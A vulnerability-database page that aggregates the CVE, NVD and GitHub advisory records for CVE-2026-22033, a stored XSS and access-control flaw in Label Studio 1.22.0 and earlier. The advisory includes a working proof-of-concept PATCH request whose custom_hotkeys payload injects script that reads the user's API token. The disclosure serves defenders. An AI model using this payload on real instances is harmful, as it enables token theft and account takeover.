Vulnerability-Lookup

CVE-2026-22033 (GCVE-0-2026-22033)

Vulnerability from cvelistv5 – Published: 2026-01-12 17:47 – Updated: 2026-01-12 18:12

Title

Label Studio vulnerable to full account takeover by chaining Stored XSS + IDOR in User Profile via custom_hotkeys field

Summary

Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users’ browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim’s API token or call token reset endpoints — enabling full account takeover and unauthorized API access.

Severity ?

8.6 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-284 - Improper Access Control

Assigner

GitHub_M

References

URL

Tags

	https://github.com/HumanSignal/label-studio/secur…	x_refsource_CONFIRM
	https://github.com/HumanSignal/label-studio/pull/9084	x_refsource_MISC
	https://github.com/HumanSignal/label-studio/commi…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	HumanSignal	label-studio	Affected: <= 1.22.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-22033",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-12T18:10:50.787745Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-12T18:12:36.147Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "label-studio",
          "vendor": "HumanSignal",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 1.22.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users\u2019 browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim\u2019s API token or call token reset endpoints \u2014 enabling full account takeover and unauthorized API access."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-12T17:47:34.060Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/pull/9084",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/pull/9084"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505"
        }
      ],
      "source": {
        "advisory": "GHSA-2mq9-hm29-8qch",
        "discovery": "UNKNOWN"
      },
      "title": "Label Studio vulnerable to full account takeover by chaining Stored XSS + IDOR in User Profile via custom_hotkeys field"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-22033",
    "datePublished": "2026-01-12T17:47:34.060Z",
    "dateReserved": "2026-01-05T22:30:38.719Z",
    "dateUpdated": "2026-01-12T18:12:36.147Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-22033\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-12T18:15:48.837\",\"lastModified\":\"2026-01-12T18:15:48.837\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users\u2019 browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim\u2019s API token or call token reset endpoints \u2014 enabling full account takeover and unauthorized API access.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-284\"}]}],\"references\":[{\"url\":\"https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/HumanSignal/label-studio/pull/9084\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-22033\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-12T18:10:50.787745Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-12T18:12:27.696Z\"}}], \"cna\": {\"title\": \"Label Studio vulnerable to full account takeover by chaining Stored XSS + IDOR in User Profile via custom_hotkeys field\", \"source\": {\"advisory\": \"GHSA-2mq9-hm29-8qch\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"HumanSignal\", \"product\": \"label-studio\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 1.22.0\"}]}], \"references\": [{\"url\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch\", \"name\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/pull/9084\", \"name\": \"https://github.com/HumanSignal/label-studio/pull/9084\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505\", \"name\": \"https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users\\u2019 browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim\\u2019s API token or call token reset endpoints \\u2014 enabling full account takeover and unauthorized API access.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-12T17:47:34.060Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-22033\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-12T18:12:36.147Z\", \"dateReserved\": \"2026-01-05T22:30:38.719Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-12T17:47:34.060Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-22033

Vulnerability from fkie_nvd - Published: 2026-01-12 18:15 - Updated: 2026-01-12 18:15

Severity ?

8.6 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505
	security-advisories@github.com	https://github.com/HumanSignal/label-studio/pull/9084
	security-advisories@github.com	https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users\u2019 browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim\u2019s API token or call token reset endpoints \u2014 enabling full account takeover and unauthorized API access."
    }
  ],
  "id": "CVE-2026-22033",
  "lastModified": "2026-01-12T18:15:48.837",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-12T18:15:48.837",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/HumanSignal/label-studio/pull/9084"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        },
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-2MQ9-HM29-8QCH

Vulnerability from github – Published: 2026-01-12 16:12 – Updated: 2026-01-12 20:06

Summary

Label Studio is vulnerable to full account takeover by chaining Stored XSS + IDOR in User Profile via custom_hotkeys field

Details

Prologue

These vulnerabilities have been found and chained by DCODX-AI. Validation of the exploit chain has been confirmed manually.

Summary

A persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users’ browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim’s API token or call token reset endpoints — enabling full account takeover and unauthorized API access. This vulnerability is of critical severity due to the broad impact, minimal requirements for exploitation (authenticated user), and the ability to escalate privileges to full account compromise.

Details

Within templates/base.html, the application renders user-controlled hotkey configuration via the following JavaScript snippet:

var __customHotkeys = {{ user.custom_hotkeys|json_dumps_ensure_ascii|safe }};

Here, user.custom_hotkeys is run through json_dumps_ensure_ascii (in core/templatetags/filters.py) which performs json.dumps(dictionary, ensure_ascii=False) but does not escape closing </script> sequences or other dangerous characters. Because the template uses the |safe filter, the output is inserted into the HTML <script> context without further escaping.

In users/api.py, the PATCH endpoint allows updating of custom_hotkeys:

user.custom_hotkeys = serializer.validated_data['custom_hotkeys']
user.save(update_fields=['custom_hotkeys'])

The serializer allows < and > characters (e.g., "…"), so an attacker can craft a JSON payload via PATCH /api/users/{id}/:

{
   "first_name":"poc",
   "last_name":"test",
   "phone":"123",
   "custom_hotkeys":{
      "INJ;</script><script>fetch(`/api/current-user/token`).then(r=>r.json()).then(t=>console.log(t.token))</script><script>/*xx":{
         "key":"x",
         "active":true
      }
   }
}

When another user loads a page using templates/base.html (for example /user/account/ or /), the rendered JavaScript includes the injected string, causing closing of the original tag and insertion of malicious <script> code. Because the application exposes /api/current-user/token ( in GET) which returns the user’s API token and CSRF protection is relaxed for this API path, the malicious script can fetch the token and send it to an attacker-controlled endpoint, thereby enabling account takeover and further API misuse.

PoC

Login to the application
Go to the login page: GET /user/login/
Identify your user ID (via API)
GET /api/current-user/whoami
In the response JSON you will see your user ID (for example "id": 123).
Note this ID for the next step.
Inject a malicious hotkey payload in the PATCH request /api/users/{id}
Using the user API, send a PATCH request to update your custom_hotkeys.

Example request

PATCH /api/users/25 HTTP/1.1
Host: 0.0.0.0:8080
Content-Length: 288
sentry-trace: 926224d7bbfb4f0da9f6ebe333744a52-88db4876de60036c-0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
content-type: application/json
baggage: sentry-environment=opensource,sentry-release=1.21.0,sentry-public_key=5f51920ff82a4675a495870244869c6b,sentry-trace_id=926224d7bbfb4f0da9f6ebe333744a52,sentry-sample_rate=0.01,sentry-transaction=%2Fuser%2Faccount,sentry-sampled=false
Accept: */*
Origin: http://0.0.0.0:8080
Referer: http://0.0.0.0:8080/user/account/personal-info
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7,nl;q=0.6
Cookie: {STRIPPED}
Connection: keep-alive

{
   "first_name":"poc",
   "last_name":"test",
   "phone":"123",
   "custom_hotkeys":{
      "INJ;</script><script>fetch(`/api/current-user/token`).then(r=>r.json()).then(t=>console.log(t.token))</script><script>/*xx":{
         "key":"x",
         "active":true
      }
   }
}

Example response

{"id":25,"first_name":"poc","last_name":"test","username":"test","email":"test@dcodx.com","last_activity":"2025-10-24T15:18:18.494398Z","custom_hotkeys":{"INJ;</script><script>fetch(`/api/current-user/token`).then(r=>r.json()).then(t=>alert(t.token))</script><script>/*xx":{"key":"x","active":true}},"avatar":null,"initials":"pt","phone":"123","active_organization":1,"active_organization_meta":{"title":"Label Studio","email":"poc_test_xgd9ce@example.com"},"allow_newsletters":false,"date_joined":"2025-10-24T15:18:18.494532Z"}

Verify the injected string persists
Still logged in as your user, go to your account page (e.g., GET /user/account/).
See the alert containing the API access token for the user. In a real world attack this token is sent to the attacker server

Impact

Exploitation impact: - Full account takeover of victim user(s). - Exposure of API tokens granting access to internal/external APIs. - Unauthorized API access, data exfiltration, token reset or privilege escalation. - If victim is administrator or privileged user, wide system compromise possible.

Who is impacted: - All users who load the template and whose session/token is accessible via browser. - The organization’s application and data. - Potentially other end-users if cross-user token exfiltration occurs.

Severity ?

8.6 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.22.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22033"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-12T16:12:50Z",
    "nvd_published_at": "2026-01-12T18:15:48Z",
    "severity": "HIGH"
  },
  "details": "### Prologue\n\nThese vulnerabilities have been found and chained by DCODX-AI. Validation of the exploit chain has been confirmed manually. \n\n### Summary\n\nA persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users\u2019 browsers when those users load any page using the `templates/base.html` template. Because the application exposes an API token endpoint (`/api/current-user/token`) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim\u2019s API token or call token reset endpoints \u2014 enabling full account takeover and unauthorized API access. This vulnerability is of critical severity due to the broad impact, minimal requirements for exploitation (authenticated user), and the ability to escalate privileges to full account compromise.\n\n### Details\nWithin `templates/base.html`, the application renders user-controlled hotkey configuration via the following JavaScript snippet:\n\n```js\nvar __customHotkeys = {{ user.custom_hotkeys|json_dumps_ensure_ascii|safe }};\n```\nHere, user.custom_hotkeys is run through json_dumps_ensure_ascii (in `core/templatetags/filters.py`) which performs `json.dumps(dictionary, ensure_ascii=False)`  but does not escape closing `\u003c/script\u003e` sequences or other dangerous characters. Because the template uses the `|safe` filter, the output is inserted into the HTML `\u003cscript\u003e` context without further escaping.\n\nIn `users/api.py`, the *PATCH* endpoint allows updating of `custom_hotkeys`:\n\n```python\nuser.custom_hotkeys = serializer.validated_data[\u0027custom_hotkeys\u0027]\nuser.save(update_fields=[\u0027custom_hotkeys\u0027])\n```\n\nThe serializer allows `\u003c` and `\u003e` characters (e.g., \"\u003c/script\u003e\u003cscript\u003e\u2026\"), so an attacker can craft a JSON payload via `PATCH /api/users/{id}/:`\n\n```json\n{\n   \"first_name\":\"poc\",\n   \"last_name\":\"test\",\n   \"phone\":\"123\",\n   \"custom_hotkeys\":{\n      \"INJ;\u003c/script\u003e\u003cscript\u003efetch(`/api/current-user/token`).then(r=\u003er.json()).then(t=\u003econsole.log(t.token))\u003c/script\u003e\u003cscript\u003e/*xx\":{\n         \"key\":\"x\",\n         \"active\":true\n      }\n   }\n}\n```\nWhen another user loads a page using templates/base.html (for example `/user/account/` or `/`), the rendered JavaScript includes the injected string, causing closing of the original \u003cscript\u003e tag and insertion of malicious `\u003cscript\u003e` code. Because the application exposes `/api/current-user/token` ( in GET) which returns the user\u2019s API token and CSRF protection is relaxed for this API path, the malicious script can fetch the token and send it to an attacker-controlled endpoint, thereby enabling account takeover and further API misuse.\n\n\n### PoC\n\n1. **Login to the application**\n- Go to the login page: `GET /user/login/`\n\n2. **Identify your user ID (via API)**\n- `GET /api/current-user/whoami`\n- In the response JSON you will see your user ID (for example `\"id\": 123`).\n- Note this ID for the next step.\n\n3. Inject a malicious hotkey payload in the PATCH request /api/users/{id}\n- Using the user API, send a `PATCH` request to update your `custom_hotkeys`.\n\nExample request\n\n```http\nPATCH /api/users/25 HTTP/1.1\nHost: 0.0.0.0:8080\nContent-Length: 288\nsentry-trace: 926224d7bbfb4f0da9f6ebe333744a52-88db4876de60036c-0\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36\ncontent-type: application/json\nbaggage: sentry-environment=opensource,sentry-release=1.21.0,sentry-public_key=5f51920ff82a4675a495870244869c6b,sentry-trace_id=926224d7bbfb4f0da9f6ebe333744a52,sentry-sample_rate=0.01,sentry-transaction=%2Fuser%2Faccount,sentry-sampled=false\nAccept: */*\nOrigin: http://0.0.0.0:8080\nReferer: http://0.0.0.0:8080/user/account/personal-info\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7,nl;q=0.6\nCookie: {STRIPPED}\nConnection: keep-alive\n\n{\n   \"first_name\":\"poc\",\n   \"last_name\":\"test\",\n   \"phone\":\"123\",\n   \"custom_hotkeys\":{\n      \"INJ;\u003c/script\u003e\u003cscript\u003efetch(`/api/current-user/token`).then(r=\u003er.json()).then(t=\u003econsole.log(t.token))\u003c/script\u003e\u003cscript\u003e/*xx\":{\n         \"key\":\"x\",\n         \"active\":true\n      }\n   }\n}\n```\nExample response\n```json\n{\"id\":25,\"first_name\":\"poc\",\"last_name\":\"test\",\"username\":\"test\",\"email\":\"test@dcodx.com\",\"last_activity\":\"2025-10-24T15:18:18.494398Z\",\"custom_hotkeys\":{\"INJ;\u003c/script\u003e\u003cscript\u003efetch(`/api/current-user/token`).then(r=\u003er.json()).then(t=\u003ealert(t.token))\u003c/script\u003e\u003cscript\u003e/*xx\":{\"key\":\"x\",\"active\":true}},\"avatar\":null,\"initials\":\"pt\",\"phone\":\"123\",\"active_organization\":1,\"active_organization_meta\":{\"title\":\"Label Studio\",\"email\":\"poc_test_xgd9ce@example.com\"},\"allow_newsletters\":false,\"date_joined\":\"2025-10-24T15:18:18.494532Z\"}\n```\n4. Verify the injected string persists\n- Still logged in as your user, go to your account page (e.g., `GET /user/account/`).\n- See the alert containing the API access token for the user. In a real world attack this token is sent to the attacker server\n\n### Impact\n\nExploitation impact:\n- Full account takeover of victim user(s).\n- Exposure of API tokens granting access to internal/external APIs.\n- Unauthorized API access, data exfiltration, token reset or privilege escalation.\n- If victim is administrator or privileged user, wide system compromise possible.\n\nWho is impacted:\n- All users who load the template and whose session/token is accessible via browser.\n- The organization\u2019s application and data.\n- Potentially other end-users if cross-user token exfiltration occurs.",
  "id": "GHSA-2mq9-hm29-8qch",
  "modified": "2026-01-12T20:06:35Z",
  "published": "2026-01-12T16:12:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22033"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/pull/9084"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/HumanSignal/label-studio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/releases/tag/nightly"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Label Studio is vulnerable to full account takeover by chaining Stored XSS + IDOR in User Profile via custom_hotkeys field"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-22033 (GCVE-0-2026-22033)

FKIE_CVE-2026-22033

GHSA-2MQ9-HM29-8QCH

Prologue

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature